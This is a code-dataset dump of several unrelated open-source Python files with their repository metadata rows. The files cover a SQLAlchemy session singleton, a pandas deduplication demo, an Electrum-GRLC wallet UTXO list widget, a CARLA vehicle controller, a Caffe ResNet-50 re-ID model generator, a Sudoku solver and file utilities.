"""DbUtils as a singleton to avoid creating excess sessions."""
__instance = None
class __DbUtils:
def __init__(self):
self._session = None
@property
def session(self):
if not self._session:
self._session = DBSessionMaker().session()
return self._session
def get(self, table: Base, entity_id: typing.Union[str, typing.Tuple[str]]) -> typing.Union[Base, None]:
"""
Query a table row by its primary key
:param table: SQLAlchemy Table to query
:param entity_id: Primary key of desired row
:return: SQLAlchemy Table object, None if not found
"""
return self.session.query(table).get(entity_id)
def query(self, table_args: typing.List[Base], filter_args: typing.List[bool] = None) -> typing.List[Base]:
"""
Query the database using the current DB session
:param table_args: List of SQLAlchemy Tables to query/join
:param filter_args: List of SQLAlchemy filter conditions
:return: List of SQLAlchemy query response objects
"""
return (
self.session.query(*table_args).filter(*filter_args).all()
if filter_args
else self.session.query(*table_args).all()
)
def commit(self):
"""
Commit changes to the database and roll back if error.
"""
self.session.commit()
def delete(self, db_object: Base):
self.session.delete(db_object)
def close(self):
self.session.close()
self._session = None
def __init__(self):
if not DbUtils.__instance:
DbUtils.__instance = DbUtils.__DbUtils()
def __getattr__(self, name):
return getattr(self.__instance, name)
@contextmanager
def db_session_manager(commit=False):
"""
:param commit: Changes will be committed when context ends.
"""
try:
db = DbUtils()
yield db
if commit:
db.commit()
except SQLAlchemyError:
db.session.rollback()
msg = "Failed to commit."
logger.exception(msg)
raise CorporaException(msg)
finally:
db.close()
def db_session(commit=False):
"""
:param commit: passed to db_session_manager
"""
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
with db_session_manager(commit):
rv = func(*args, **kwargs)
return rv
return wrapper
return decorator
| 27.37963 | 115 | 0.595536 |
1cc6c0247a3d41cae0569d2ce12d2d8ff1fec709 | 595 | py | Python | code/pandas/pd_duplicated.py | yuguiyang/python_demo | 1be2406bfc920e22a0f92bf10d9a3665984067ba | [
"Apache-2.0"
] | null | null | null | code/pandas/pd_duplicated.py | yuguiyang/python_demo | 1be2406bfc920e22a0f92bf10d9a3665984067ba | [
"Apache-2.0"
] | null | null | null | code/pandas/pd_duplicated.py | yuguiyang/python_demo | 1be2406bfc920e22a0f92bf10d9a3665984067ba | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Tue Aug 15 16:03:44 2017
@author: hexo
"""
import pandas as pd
import numpy as np
data = pd.DataFrame({'k1': ['one'] * 3 + ['two'] * 4,
'k2': [1, 1, 2, 3, 3, 4, 4]})
data
data.duplicated()
data.drop_duplicates()
data['v1'] = range(7)
data.drop_duplicates(['k1'])
data.drop_duplicates(['k1', 'k2'], take_last=True)
#重复数据
data = pd.Series([1., -999., 2., -999., -1000., 3.])
data
data.replace(-999, np.nan)
data.replace([-999, -1000], np.nan)
data.replace([-999, -1000], [np.nan, 0])
data.replace({-999: np.nan, -1000: 0})
| 14.875 | 53 | 0.573109 |
0f106d2e9b61e5a496d7cecc5027dd1ac994a78c | 10,496 | py | Python | electrum_grlc/gui/qt/utxo_list.py | garlico-in/electrum-grlc | 06ba1b330ef354ca575d0688cbd2d64a90fd276e | [
"MIT"
] | null | null | null | electrum_grlc/gui/qt/utxo_list.py | garlico-in/electrum-grlc | 06ba1b330ef354ca575d0688cbd2d64a90fd276e | [
"MIT"
] | null | null | null | electrum_grlc/gui/qt/utxo_list.py | garlico-in/electrum-grlc | 06ba1b330ef354ca575d0688cbd2d64a90fd276e | [
"MIT"
] | null | null | null | #!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from typing import Optional, List, Dict, Sequence, Set
from enum import IntEnum
import copy
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QStandardItemModel, QStandardItem, QFont
from PyQt5.QtWidgets import QAbstractItemView, QMenu, QLabel, QHBoxLayout
from electrum_grlc.i18n import _
from electrum_grlc.transaction import PartialTxInput
from .util import MyTreeView, ColorScheme, MONOSPACE_FONT, EnterButton
class UTXOList(MyTreeView):
_spend_set: Optional[Set[str]] # coins selected by the user to spend from
_utxo_dict: Dict[str, PartialTxInput] # coin name -> coin
class Columns(IntEnum):
OUTPOINT = 0
ADDRESS = 1
LABEL = 2
AMOUNT = 3
HEIGHT = 4
headers = {
Columns.ADDRESS: _('Address'),
Columns.LABEL: _('Label'),
Columns.AMOUNT: _('Amount'),
Columns.HEIGHT: _('Height'),
Columns.OUTPOINT: _('Output point'),
}
filter_columns = [Columns.ADDRESS, Columns.LABEL, Columns.OUTPOINT]
stretch_column = Columns.LABEL
ROLE_PREVOUT_STR = Qt.UserRole + 1000
def __init__(self, parent):
super().__init__(parent, self.create_menu,
stretch_column=self.stretch_column)
self._spend_set = None
self._utxo_dict = {}
self.wallet = self.parent.wallet
self.setModel(QStandardItemModel(self))
self.setSelectionMode(QAbstractItemView.ExtendedSelection)
self.setSortingEnabled(True)
self.update()
def update(self):
# not calling maybe_defer_update() as it interferes with coincontrol status bar
utxos = self.wallet.get_utxos()
self._maybe_reset_spend_list(utxos)
self._utxo_dict = {}
self.model().clear()
self.update_headers(self.__class__.headers)
for idx, utxo in enumerate(utxos):
self.insert_utxo(idx, utxo)
self.filter()
# update coincontrol status bar
if self._spend_set is not None:
coins = [self._utxo_dict[x] for x in self._spend_set]
coins = self._filter_frozen_coins(coins)
amount = sum(x.value_sats() for x in coins)
amount_str = self.parent.format_amount_and_units(amount)
num_outputs_str = _("{} outputs available ({} total)").format(len(coins), len(utxos))
self.parent.set_coincontrol_msg(_("Coin control active") + f': {num_outputs_str}, {amount_str}')
else:
self.parent.set_coincontrol_msg(None)
def insert_utxo(self, idx, utxo: PartialTxInput):
address = utxo.address
height = utxo.block_height
name = utxo.prevout.to_str()
name_short = utxo.prevout.txid.hex()[:16] + '...' + ":%d" % utxo.prevout.out_idx
self._utxo_dict[name] = utxo
label = self.wallet.get_label_for_txid(utxo.prevout.txid.hex()) or self.wallet.get_label(address)
amount = self.parent.format_amount(utxo.value_sats(), whitespaces=True)
labels = [name_short, address, label, amount, '%d'%height]
utxo_item = [QStandardItem(x) for x in labels]
self.set_editability(utxo_item)
utxo_item[self.Columns.OUTPOINT].setData(name, self.ROLE_CLIPBOARD_DATA)
utxo_item[self.Columns.OUTPOINT].setData(name, self.ROLE_PREVOUT_STR)
utxo_item[self.Columns.ADDRESS].setFont(QFont(MONOSPACE_FONT))
utxo_item[self.Columns.AMOUNT].setFont(QFont(MONOSPACE_FONT))
utxo_item[self.Columns.OUTPOINT].setFont(QFont(MONOSPACE_FONT))
SELECTED_TO_SPEND_TOOLTIP = _('Coin selected to be spent')
if name in (self._spend_set or set()):
for col in utxo_item:
col.setBackground(ColorScheme.GREEN.as_color(True))
if col != self.Columns.OUTPOINT:
col.setToolTip(SELECTED_TO_SPEND_TOOLTIP)
if self.wallet.is_frozen_address(address):
utxo_item[self.Columns.ADDRESS].setBackground(ColorScheme.BLUE.as_color(True))
utxo_item[self.Columns.ADDRESS].setToolTip(_('Address is frozen'))
if self.wallet.is_frozen_coin(utxo):
utxo_item[self.Columns.OUTPOINT].setBackground(ColorScheme.BLUE.as_color(True))
utxo_item[self.Columns.OUTPOINT].setToolTip(f"{name}\n{_('Coin is frozen')}")
else:
tooltip = ("\n" + SELECTED_TO_SPEND_TOOLTIP) if name in (self._spend_set or set()) else ""
utxo_item[self.Columns.OUTPOINT].setToolTip(name + tooltip)
self.model().insertRow(idx, utxo_item)
def get_selected_outpoints(self) -> Optional[List[str]]:
if not self.model():
return None
items = self.selected_in_column(self.Columns.OUTPOINT)
return [x.data(self.ROLE_PREVOUT_STR) for x in items]
def _filter_frozen_coins(self, coins: List[PartialTxInput]) -> List[PartialTxInput]:
coins = [utxo for utxo in coins
if (not self.wallet.is_frozen_address(utxo.address) and
not self.wallet.is_frozen_coin(utxo))]
return coins
def set_spend_list(self, coins: Optional[List[PartialTxInput]]):
if coins is not None:
coins = self._filter_frozen_coins(coins)
self._spend_set = {utxo.prevout.to_str() for utxo in coins}
else:
self._spend_set = None
self.update()
def get_spend_list(self) -> Optional[Sequence[PartialTxInput]]:
if self._spend_set is None:
return None
utxos = [self._utxo_dict[x] for x in self._spend_set]
return copy.deepcopy(utxos) # copy so that side-effects don't affect utxo_dict
def _maybe_reset_spend_list(self, current_wallet_utxos: Sequence[PartialTxInput]) -> None:
if self._spend_set is None:
return
# if we spent one of the selected UTXOs, just reset selection
utxo_set = {utxo.prevout.to_str() for utxo in current_wallet_utxos}
if not all([prevout_str in utxo_set for prevout_str in self._spend_set]):
self._spend_set = None
def create_menu(self, position):
selected = self.get_selected_outpoints()
if selected is None:
return
menu = QMenu()
menu.setSeparatorsCollapsible(True) # consecutive separators are merged together
coins = [self._utxo_dict[name] for name in selected]
if len(coins) == 0:
menu.addAction(_("Spend (select none)"), lambda: self.set_spend_list(coins))
else:
menu.addAction(_("Spend"), lambda: self.set_spend_list(coins))
if len(coins) == 1:
utxo = coins[0]
addr = utxo.address
txid = utxo.prevout.txid.hex()
# "Details"
tx = self.wallet.db.get_transaction(txid)
if tx:
label = self.wallet.get_label_for_txid(txid)
menu.addAction(_("Details"), lambda: self.parent.show_transaction(tx, tx_desc=label))
# "Copy ..."
idx = self.indexAt(position)
if not idx.isValid():
return
self.add_copy_menu(menu, idx)
# "Freeze coin"
if not self.wallet.is_frozen_coin(utxo):
menu.addAction(_("Freeze Coin"), lambda: self.parent.set_frozen_state_of_coins([utxo], True))
else:
menu.addSeparator()
menu.addAction(_("Coin is frozen"), lambda: None).setEnabled(False)
menu.addAction(_("Unfreeze Coin"), lambda: self.parent.set_frozen_state_of_coins([utxo], False))
menu.addSeparator()
# "Freeze address"
if not self.wallet.is_frozen_address(addr):
menu.addAction(_("Freeze Address"), lambda: self.parent.set_frozen_state_of_addresses([addr], True))
else:
menu.addSeparator()
menu.addAction(_("Address is frozen"), lambda: None).setEnabled(False)
menu.addAction(_("Unfreeze Address"), lambda: self.parent.set_frozen_state_of_addresses([addr], False))
menu.addSeparator()
elif len(coins) > 1: # multiple items selected
menu.addSeparator()
addrs = [utxo.address for utxo in coins]
is_coin_frozen = [self.wallet.is_frozen_coin(utxo) for utxo in coins]
is_addr_frozen = [self.wallet.is_frozen_address(utxo.address) for utxo in coins]
if not all(is_coin_frozen):
menu.addAction(_("Freeze Coins"), lambda: self.parent.set_frozen_state_of_coins(coins, True))
if any(is_coin_frozen):
menu.addAction(_("Unfreeze Coins"), lambda: self.parent.set_frozen_state_of_coins(coins, False))
if not all(is_addr_frozen):
menu.addAction(_("Freeze Addresses"), lambda: self.parent.set_frozen_state_of_addresses(addrs, True))
if any(is_addr_frozen):
menu.addAction(_("Unfreeze Addresses"), lambda: self.parent.set_frozen_state_of_addresses(addrs, False))
menu.exec_(self.viewport().mapToGlobal(position))
def get_filter_data_from_coordinate(self, row, col):
if col == self.Columns.OUTPOINT:
return self.get_role_data_from_coordinate(row, col, role=self.ROLE_PREVOUT_STR)
return super().get_filter_data_from_coordinate(row, col)
| 46.648889 | 120 | 0.657298 |
e9fad523e9374bfeb845f19f6412e635aed4df7e | 3,812 | py | Python | haco/DIDrive_core/simulators/srunner/scenariomanager/actorcontrols/npc_vehicle_control.py | decisionforce/HACO | ebd1dc49598e6ae2704e58c053cc35f2d9e28429 | [
"Apache-2.0"
] | 21 | 2022-02-15T10:11:54.000Z | 2022-03-24T17:44:29.000Z | haco/DIDrive_core/simulators/srunner/scenariomanager/actorcontrols/npc_vehicle_control.py | decisionforce/HACO | ebd1dc49598e6ae2704e58c053cc35f2d9e28429 | [
"Apache-2.0"
] | null | null | null | haco/DIDrive_core/simulators/srunner/scenariomanager/actorcontrols/npc_vehicle_control.py | decisionforce/HACO | ebd1dc49598e6ae2704e58c053cc35f2d9e28429 | [
"Apache-2.0"
] | 3 | 2022-02-22T11:11:43.000Z | 2022-03-17T17:58:44.000Z | #!/usr/bin/env python
# Copyright (c) 2020 Intel Corporation
#
# This work is licensed under the terms of the MIT license.
# For a copy, see <https://opensource.org/licenses/MIT>.
"""
This module provides an example control for vehicles
"""
import math
import carla
from haco.DIDrive_core.utils.simulator_utils.carla_agents.navigation.basic_agent import LocalPlanner
from haco.DIDrive_core.utils.simulator_utils.carla_agents.navigation.local_planner import RoadOption
from haco.DIDrive_core.simulators.carla_data_provider import CarlaDataProvider
from haco.DIDrive_core.simulators.srunner.scenariomanager.actorcontrols.basic_control import BasicControl
class NpcVehicleControl(BasicControl):
"""
Controller class for vehicles derived from BasicControl.
The controller makes use of the LocalPlanner implemented in CARLA.
Args:
actor (carla.Actor): Vehicle actor that should be controlled.
"""
_args = {'K_P': 1.0, 'K_D': 0.01, 'K_I': 0.0, 'dt': 0.05}
def __init__(self, actor, args=None):
super(NpcVehicleControl, self).__init__(actor)
self._local_planner = LocalPlanner( # pylint: disable=undefined-variable
self._actor, opt_dict={
'target_speed': self._target_speed * 3.6, 'lateral_control_dict': self._args})
if self._waypoints:
self._update_plan()
def _update_plan(self):
"""
Update the plan (waypoint list) of the LocalPlanner
"""
plan = []
for transform in self._waypoints:
waypoint = CarlaDataProvider.get_map().get_waypoint(
transform.location, project_to_road=True, lane_type=carla.LaneType.Any
)
plan.append((waypoint, RoadOption.LANEFOLLOW))
self._local_planner.set_global_plan(plan)
def reset(self):
"""
Reset the controller
"""
if self._actor and self._actor.is_alive:
if self._local_planner:
self._local_planner.reset_vehicle()
self._local_planner = None
self._actor = None
def run_step(self):
"""
Execute on tick of the controller's control loop
If _waypoints are provided, the vehicle moves towards the next waypoint
with the given _target_speed, until reaching the final waypoint. Upon reaching
the final waypoint, _reached_goal is set to True.
If _waypoints is empty, the vehicle moves in its current direction with
the given _target_speed.
If _init_speed is True, the control command is post-processed to ensure that
the initial actor velocity is maintained independent of physics.
"""
self._reached_goal = False
if self._waypoints_updated:
self._waypoints_updated = False
self._update_plan()
target_speed = self._target_speed
self._local_planner.set_speed(target_speed * 3.6)
control = self._local_planner.run_step(debug=False)
# Check if the actor reached the end of the plan
if self._local_planner.done():
self._reached_goal = True
self._actor.apply_control(control)
if self._init_speed:
current_speed = math.sqrt(self._actor.get_velocity().x ** 2 + self._actor.get_velocity().y ** 2)
# If _init_speed is set, and the PID controller is not yet up to the point to take over,
# we manually set the vehicle to drive with the correct velocity
if abs(target_speed - current_speed) > 3:
yaw = self._actor.get_transform().rotation.yaw * (math.pi / 180)
vx = math.cos(yaw) * target_speed
vy = math.sin(yaw) * target_speed
self._actor.set_velocity(carla.Vector3D(vx, vy, 0))
| 36.304762 | 108 | 0.663169 |
60ba267a6bebd580aeedf342a3ed46329af52c54 | 7,360 | py | Python | models/market1501/generate_resnet50.py | zhunzhong07/caffe-reid | 7468850ab80858006bd65bcc6203e0581c83aea9 | [
"BSD-2-Clause"
] | 3 | 2017-03-16T07:42:31.000Z | 2021-07-15T22:09:46.000Z | models/market1501/generate_resnet50.py | zhunzhong07/caffe-reid | 7468850ab80858006bd65bcc6203e0581c83aea9 | [
"BSD-2-Clause"
] | null | null | null | models/market1501/generate_resnet50.py | zhunzhong07/caffe-reid | 7468850ab80858006bd65bcc6203e0581c83aea9 | [
"BSD-2-Clause"
] | 2 | 2019-03-09T02:47:50.000Z | 2020-08-24T15:43:38.000Z | import _init_paths
import os
import os.path as osp
import caffe
from caffe import layers as L, params as P
from caffe import tools
from caffe.model_libs import *
def res_unit(net, bottom, in_c, out_c, stride, base_name, post, is_train=False):
assert (out_c % 4 == 0)
pase_name = base_name
base_name = base_name + post
if (in_c != out_c):
#param = pase_name + '_branch1'
net['res'+base_name+'_branch1'], net['bn'+base_name+'_branch1'], net['scale'+base_name+'_branch1'] = \
conv_bn_scale(bottom, 1, out_c, stride=stride, is_train=is_train, has_relu=False, bias_term=False)
#conv_bn_scale(bottom, 1, out_c, base_param_name=param, stride=stride, is_train=is_train, has_relu=False, bias_term=False)
identity = net['scale'+base_name+'_branch1']
else:
identity = bottom
#param = pase_name + '_branch2a'
net['res'+base_name+'_branch2a'], net['bn'+base_name+'_branch2a'], net['scale'+base_name+'_branch2a'], net['res'+base_name+'_branch2a_relu'] = \
conv_bn_scale(bottom, 1, out_c/4, stride=stride, is_train=is_train, has_relu=True, bias_term=False)
#conv_bn_scale(bottom, 1, out_c/4, base_param_name=param, stride=stride, is_train=is_train, has_relu=True, bias_term=False)
#param = pase_name + '_branch2b'
net['res'+base_name+'_branch2b'], net['bn'+base_name+'_branch2b'], net['scale'+base_name+'_branch2b'], net['res'+base_name+'_branch2b_relu'] = \
conv_bn_scale(net['res'+base_name+'_branch2a_relu'], 3, out_c/4, pad=1, is_train=is_train, has_relu=True, bias_term=False)
#conv_bn_scale(net['res'+base_name+'_branch2a_relu'], 3, out_c/4, base_param_name=param, pad=1, is_train=is_train, has_relu=True, bias_term=False)
#param = pase_name + '_branch2c'
net['res'+base_name+'_branch2c'], net['bn'+base_name+'_branch2c'], net['scale'+base_name+'_branch2c'] = \
conv_bn_scale(net['res'+base_name+'_branch2b_relu'], 1, out_c, is_train=is_train, has_relu=False, bias_term=False)
#conv_bn_scale(net['res'+base_name+'_branch2b_relu'], 1, out_c, base_param_name=param, is_train=is_train, has_relu=False, bias_term=False)
final = net['scale'+base_name+'_branch2c']
net['res'+base_name] = L.Eltwise(identity, final)
net['res'+base_name+'_relu'] = L.ReLU(net['res'+base_name], in_place=True)
final_name = 'res'+base_name+'_relu'
return net, final_name
def res50_body(net, data, post, is_train):
net['conv1'+post], net['bn_conv1'+post], net['scale_conv1'+post], net['conv1_relu'+post] = \
conv_bn_scale(net[data], 7, 64, pad = 3, stride = 2, is_train=is_train, has_relu=True)
net['pool1'+post] = max_pool(net['conv1_relu'+post], 3, stride=2)
names, outs = ['2a', '2b', '2c'], [256, 256, 256]
pre_out = 64
final = 'pool1'+post
for (name, out) in zip(names, outs):
net, final = res_unit(net, net[final], pre_out, out, 1, name, post, is_train=is_train)
pre_out = out
names, outs = ['3a', '3b', '3c', '3d'], [512, 512, 512, 512]
for (name, out) in zip(names, outs):
if (name == '3a'):
net, final = res_unit(net, net[final], pre_out, out, 2, name, post, is_train=is_train)
else:
net, final = res_unit(net, net[final], pre_out, out, 1, name, post, is_train=is_train)
pre_out = out
names = ['4a', '4b', '4c', '4d', '4e', '4f']
out = 1024
for name in names:
if (name == '4a'):
net, final = res_unit(net, net[final], pre_out, out, 2, name, post, is_train=is_train)
else:
net, final = res_unit(net, net[final], pre_out, out, 1, name, post, is_train=is_train)
pre_out = out
names = ['5a', '5b', '5c']
out = 2048
for name in names:
if (name == '5a'):
net, final = res_unit(net, net[final], pre_out, out, 2, name, post, is_train=is_train)
else:
net, final = res_unit(net, net[final], pre_out, out, 1, name, post, is_train=is_train)
pre_out = out
net['pool5'+post] = ave_pool(net[final], 7, 1)
final = 'pool5'+post
return net, final
# main netspec wrapper
def res50_train(mean_value, list_file, is_train=True):
# setup the python data layer
net = caffe.NetSpec()
net.data, net.label \
= L.ReidData(transform_param=dict(mirror=True,crop_size=224,mean_value=mean_value),
reid_data_param=dict(source=list_file,batch_size=16,new_height=256,new_width=256,
pos_fraction=1,neg_fraction=1,pos_limit=1,neg_limit=4,pos_factor=1,neg_factor=1.01),
ntop = 2)
net, final = res50_body(net, 'data', '', is_train)
net['score'] = fc_relu(net[final], nout=751, is_train=is_train, has_relu=False)
net['euclidean'], net['label_dif'] = L.PairEuclidean(net[final], net['label'], ntop = 2)
net['score_dif'] = fc_relu(net['euclidean'], nout=2, is_train=is_train, has_relu=False)
net['loss'] = L.SoftmaxWithLoss(net['score'], net['label'] , propagate_down=[1,0], loss_weight=1)
net['loss_dif'] = L.SoftmaxWithLoss(net['score_dif'], net['label_dif'], propagate_down=[1,0], loss_weight=0.5)
return str(net.to_proto())
def res50_dev(data_param = dict(shape=dict(dim=[2, 3, 224, 224])), label_param = dict(shape=dict(dim=[2]))):
# setup the python data layer
net = caffe.NetSpec()
net['data'] = L.Input(input_param = data_param)
net['label'] = L.Input(input_param = label_param)
net, final = res50_body(net, 'data', '', is_train=False)
net['score'] = fc_relu(net[final], nout=751, is_train=False, has_relu=False)
net['euclidean'], net['label_dif'] = L.PairEuclidean(net[final], net['label'], ntop = 2)
net['score_dif'] = fc_relu(net['euclidean'], nout=2, is_train=False, has_relu=False)
return str(net.to_proto())
def res50_score(input_param = dict(shape=dict(dim=[1, 3, 224, 224]))):
# setup the python data layer
net = caffe.NetSpec()
net['data'] = L.Input(input_param = input_param)
net, final = res50_body(net, 'data', '', is_train=False)
net['score'] = fc_relu(net[final], nout=751, is_train=False, has_relu=False)
net['prediction'] = L.Softmax(net['score'])
return str(net.to_proto())
workdir = osp.join(osp.dirname(__file__), 'res50')
if not os.path.isdir(workdir):
os.makedirs(workdir)
logdir = osp.join(workdir, 'log')
if not os.path.isdir(logdir):
os.makedirs(logdir)
snapshotdir = osp.join(workdir, 'snapshot')
if not os.path.isdir(snapshotdir):
os.makedirs(snapshotdir)
print('Work Dir : {}'.format(workdir))
train_proto = osp.join(workdir, "train.proto")
solverproto = tools.CaffeSolver(trainnet_prototxt_path = train_proto, testnet_prototxt_path = None)
solverproto.sp['display'] = "100"
solverproto.sp['base_lr'] = "0.001"
solverproto.sp['stepsize'] = "16000"
solverproto.sp['max_iter'] = "18000"
solverproto.sp['snapshot'] = "1000"
solverproto.sp['iter_size'] = "4"
solverproto.sp['snapshot_prefix'] = "\"{}/snapshot/res50.full\"".format(workdir)
solverproto.write(osp.join(workdir, 'solver.proto'))
list_file = 'examples/market1501/lists/train.lst'
mean_value = [97.8286, 99.0468, 105.606]
# write train net.
with open(train_proto, 'w') as f:
f.write(res50_train(mean_value, list_file, True))
dev_proto = osp.join(workdir, "dev.proto")
with open(dev_proto, 'w') as f:
f.write(res50_score())
dep_proto = osp.join(workdir, "deploy.proto")
with open(dep_proto, 'w') as f:
f.write(res50_dev())
| 44.071856 | 153 | 0.670516 |
5afe4acc19c3deff0621391e914c850fd9d6e5e9 | 4,126 | py | Python | leetcode/python/sudokuSolver.py | yaoxuanw007/forfun | db50bd40852d49bd68bae03ceb43cb4a901c6d37 | [
"MIT"
] | null | null | null | leetcode/python/sudokuSolver.py | yaoxuanw007/forfun | db50bd40852d49bd68bae03ceb43cb4a901c6d37 | [
"MIT"
] | null | null | null | leetcode/python/sudokuSolver.py | yaoxuanw007/forfun | db50bd40852d49bd68bae03ceb43cb4a901c6d37 | [
"MIT"
] | null | null | null | # https://oj.leetcode.com/problems/sudoku-solver/
class Solution:
# @param board, a 9x9 2D array
# Solve the Sudoku by modifying the input board in-place.
# Do not return any value.
def solveSudoku(self, board):
if len(board) == 0 or len(board[0]) == 0:
return
m, n = len(board), len(board[0])
for i in xrange(m):
board[i] = [x for x in board[i]]
self.solve(board, m, n)
for i in xrange(m):
board[i] = ''.join(board[i])
def solve(self, board, m, n):
for i in xrange(m):
for j in xrange(n):
if board[i][j] == '.':
for k in xrange(1, 10):
board[i][j] = str(k)
if self.isValid(board, i, j) and self.solve(board, m, n):
return True
board[i][j] = '.'
return False
return True
def isValid(self, board, x, y):
# 1*9
flags = [False] * 9
for i in xrange(9):
if board[x][i] != '.':
num = int(board[x][i]) - 1
if flags[num]:
return False
flags[num] = True
# 9*1
flags = [False] * 9
for i in xrange(9):
if board[i][y] != '.':
num = int(board[i][y]) - 1
if flags[num]:
return False
flags[num] = True
# 3*3
flags = [False] * 9
r, c = x/3, y/3
for i in xrange(3):
for j in xrange(3):
if board[r*3+i][c*3+j] != '.':
num = int(board[r*3+i][c*3+j]) - 1
if flags[num]:
return False
flags[num] = True
return True
import pprint as pp
# Pass OJ !!
class Solution1:
# @param board, a 9x9 2D array
# Solve the Sudoku by modifying the input board in-place.
# Do not return any value.
def solveSudoku(self, board):
if len(board) == 0 or len(board[0]) == 0:
return
m, n = len(board), len(board[0])
for i in xrange(m):
board[i] = [x for x in board[i]]
self.createBoardAvail(board, m, n)
self.solve(board, m, n)
for i in xrange(m):
board[i] = ''.join(board[i])
def createBoardAvail(self, board, m, n):
self.boardAvail = [[None]*n for i in xrange(m)]
for x in xrange(m):
for y in xrange(n):
self.boardAvail[x][y] = set([str(k) for k in range(1,10)])
for x in xrange(m):
for y in xrange(n):
self.removeBoardAvail(board, x, y)
# pp.pprint(self.boardAvail)
def removeBoardAvail(self, board, x, y, boardDelta=None):
if board[x][y] != '.':
for i in xrange(9):
if board[x][y] in self.boardAvail[i][y]:
if boardDelta:
boardDelta[i][y] = True
self.boardAvail[i][y].remove(board[x][y])
for i in xrange(9):
if board[x][y] in self.boardAvail[x][i]:
if boardDelta:
boardDelta[x][i] = True
self.boardAvail[x][i].remove(board[x][y])
r, c = x//3, y//3
for i in xrange(3):
for j in xrange(3):
if board[x][y] in self.boardAvail[r*3+i][c*3+j]:
if boardDelta:
boardDelta[r*3+i][c*3+j] = True
self.boardAvail[r*3+i][c*3+j].remove(board[x][y])
def addBoardAvail(self, board, x, y, boardDelta):
if board[x][y] != '.':
for i in xrange(9):
for j in xrange(9):
if boardDelta[i][j]:
boardDelta[i][j] = False
self.boardAvail[i][j].add(board[x][y])
def solve(self, board, m, n):
for x in xrange(m):
for y in xrange(n):
if board[x][y] == '.':
boardDelta = [[False]*n for i in xrange(m)]
for num in [str(n) for n in xrange(1, 10)]:
if num in self.boardAvail[x][y]:
board[x][y] = num
self.removeBoardAvail(board, x, y, boardDelta)
# pp.pprint([board, self.boardAvail])
if self.solve(board, m, n):
return True
self.addBoardAvail(board, x, y, boardDelta)
board[x][y] = '.'
return False
return True
# Test
s = Solution1()
board = [".87654329","2........","3........","4........","5........","6........","7........","8........","9........"]
s.solveSudoku(board)
print board
| 29.683453 | 117 | 0.509937 |
b70863d7f362b687c4a64a93c1d8949441eff751 | 3,039 | py | Python | rltorch/utils/file_utils.py | Jjschwartz/rltorch | eeb2ad955f018d768db98c4a2be5da96a75579f6 | [
"MIT"
] | null | null | null | rltorch/utils/file_utils.py | Jjschwartz/rltorch | eeb2ad955f018d768db98c4a2be5da96a75579f6 | [
"MIT"
] | null | null | null | rltorch/utils/file_utils.py | Jjschwartz/rltorch | eeb2ad955f018d768db98c4a2be5da96a75579f6 | [
"MIT"
] | null | null | null | """This module contains general file handling functions, common to
multiple packages.
"""
import os
import yaml
import shutil
import pathlib
import tempfile
import os.path as osp
def load_yaml(file_path):
"""Load yaml file located at file path, throws error if theres an issue
loading file.
"""
with open(file_path) as fin:
content = yaml.load(fin, Loader=yaml.FullLoader)
return content
def write_yaml(file_path, data):
"""Write a dictionary to yaml file """
with open(file_path, "w") as fout:
yaml.dump(data, fout)
def get_file_name(file_path):
"""Extracts the file or directory name from a file path, removing
extension.
"""
full_file_name = file_path.split(os.sep)[-1]
file_name = full_file_name.split(".")[0]
return file_name
def get_dir_name(path):
"""Get the name of top level directory in path. """
if osp.isfile(path):
return osp.basename(osp.dirname(path))
return osp.basename(osp.abspath(path))
def get_parent_dir_path(path):
"""Returns the path to the parent directory in path. """
if osp.isfile(path):
return osp.dirname(path)
return osp.dirname(osp.abspath(path))
def make_dir(dir_path, msg=None):
"""Makes a new directory at given path, or prints warning if one already
exists.
"""
if osp.exists(dir_path):
if msg is None:
print(f"WARNING: dir {dir_path} already exists.")
else:
print(f"WARNING: {msg}")
pathlib.Path(dir_path).mkdir(exist_ok=True)
def setup_sub_dir(parent_dir, sub_dir):
"""Setup save directory for single episode trace """
new_dir = osp.join(parent_dir, sub_dir)
make_dir(new_dir, f"sub dir already exists, storing there any way")
return new_dir
def generate_file_path(parent_dir, file_name, extension):
"""Generates a full file path from a parent directory, file name and
file extension.
"""
if extension[0] != ".":
extension = "." + extension
return osp.join(parent_dir, file_name + extension)
def replace_extension(file_path, extension):
"""Generate a new file path from existing file path and new extension """
split_path = file_path.rsplit(".", 1)
return ".".join([split_path[0], extension])
def get_all_files_from_dir(dir, extension=None):
"""Returns full file paths of all files in directory with optional
filtering by file extension.
"""
file_list = os.listdir(dir)
files = []
for file_name in file_list:
if extension is None or extension in file_name:
files.append(osp.join(dir, file_name))
return files
def get_tmp_file(suffix=None):
"""Returns full path to a temporary file.
Suffix is optional file ending (e.g. .txt). Must include '.' if required.
"""
with tempfile.NamedTemporaryFile(suffix=suffix) as temp_file:
return temp_file.name
def move_dirs_into_parent_dir(dir_paths, parent_dir):
make_dir(parent_dir)
for d in dir_paths:
shutil.move(d, parent_dir)
| 28.138889 | 77 | 0.679171 |
7f34b6324813a0e3e136adf01ab4f615d4141d37 | 5,045 | py | Python | env/lib/python3.8/site-packages/plotly/graph_objs/scattergl/selected/_textfont.py | acrucetta/Chicago_COVI_WebApp | a37c9f492a20dcd625f8647067394617988de913 | [
"MIT",
"Unlicense"
